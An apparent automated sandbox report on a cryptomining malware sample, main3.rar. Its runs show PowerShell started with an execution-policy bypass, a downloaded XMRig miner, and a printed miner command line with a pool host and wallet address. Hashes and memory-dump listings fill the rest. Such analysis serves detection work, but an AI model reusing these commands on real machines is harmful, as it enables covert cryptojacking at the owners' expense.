Analysis Overview
SHA256
4989b2b14eed528c576634ce1f8a74caa71ae3c67773a1e7758a6ab6f51f5b88
Threat Level: Known bad
The file main3.rar was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Blocklisted process makes network request
Executes dropped EXE
Command and Scripting Interpreter: PowerShell
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 01:50
Signatures
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win11-20240508-en
Max time kernel
1759s
Max time network
1771s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4852-0-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yoi34s1j.igp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4852-9-0x0000020BE5780000-0x0000020BE57A2000-memory.dmp
memory/4852-10-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-11-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-13-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
memory/4852-14-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
Analysis: behavioral26
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:15
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4252 wrote to memory of 3968 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4252 wrote to memory of 3968 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.24.18.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4252-3-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp
memory/4252-5-0x0000010CE9E40000-0x0000010CE9E62000-memory.dmp
memory/4252-6-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/4252-9-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/4252-10-0x0000010CE9FF0000-0x0000010CEA066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0dllvs5e.sl2.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4252-25-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/4252-48-0x0000010CEA190000-0x0000010CEA1A2000-memory.dmp
memory/4252-61-0x0000010CE9FE0000-0x0000010CE9FEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3968-90-0x000001C4BF560000-0x000001C4BF580000-memory.dmp
memory/3968-91-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-92-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/4252-93-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/4252-94-0x00007FF83E4B3000-0x00007FF83E4B4000-memory.dmp
memory/4252-95-0x00007FF83E4B0000-0x00007FF83EE9C000-memory.dmp
memory/3968-96-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-97-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-98-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-99-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-100-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-101-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-102-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-103-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-104-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-105-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-106-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-107-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-108-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-109-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-110-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-111-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-112-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-113-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-114-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-115-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-116-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-117-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-118-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-119-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-120-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-121-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-122-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-123-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-124-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-125-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-126-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-127-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-128-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-129-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-130-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-131-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-132-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-133-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-134-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-135-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-136-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-137-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-138-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-139-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-140-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-141-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-142-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-143-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-144-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-145-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-146-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-147-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-148-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-149-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-150-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-151-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-152-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-153-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-154-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-155-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
memory/3968-156-0x00007FF6CEDA0000-0x00007FF6CF9D3000-memory.dmp
Analysis: behavioral30
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:17
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 2848 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2916 wrote to memory of 2848 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
Files
memory/2916-2-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2916-5-0x00000146412F0000-0x0000014641312000-memory.dmp
memory/2916-6-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2916-7-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2916-10-0x00000146414A0000-0x0000014641516000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mtddsseb.dc4.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2916-25-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2916-48-0x0000014641520000-0x0000014641532000-memory.dmp
memory/2916-61-0x0000014641490000-0x000001464149A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2848-90-0x0000022E6EAE0000-0x0000022E6EB00000-memory.dmp
memory/2848-91-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2916-92-0x00007FF931353000-0x00007FF931354000-memory.dmp
memory/2916-93-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2848-94-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2916-95-0x00007FF931350000-0x00007FF931D3C000-memory.dmp
memory/2848-96-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-97-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-98-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-99-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-100-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-101-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-102-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-103-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-104-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-105-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-106-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-107-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-108-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-109-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-110-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-111-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-112-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-113-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-114-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-115-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-116-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-117-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-118-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-119-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-120-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-121-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-122-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-123-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-124-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-125-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-126-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-127-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-128-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-129-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-130-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-131-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-132-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-133-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-134-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-135-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-136-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-137-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-138-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-139-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-140-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-141-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-142-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-143-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-144-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-145-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-146-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-147-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-148-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-149-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-150-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-151-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-152-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-153-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-154-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-155-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
memory/2848-156-0x00007FF75FFD0000-0x00007FF760C03000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:05
Platform
win11-20240508-en
Max time kernel
1709s
Max time network
1719s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
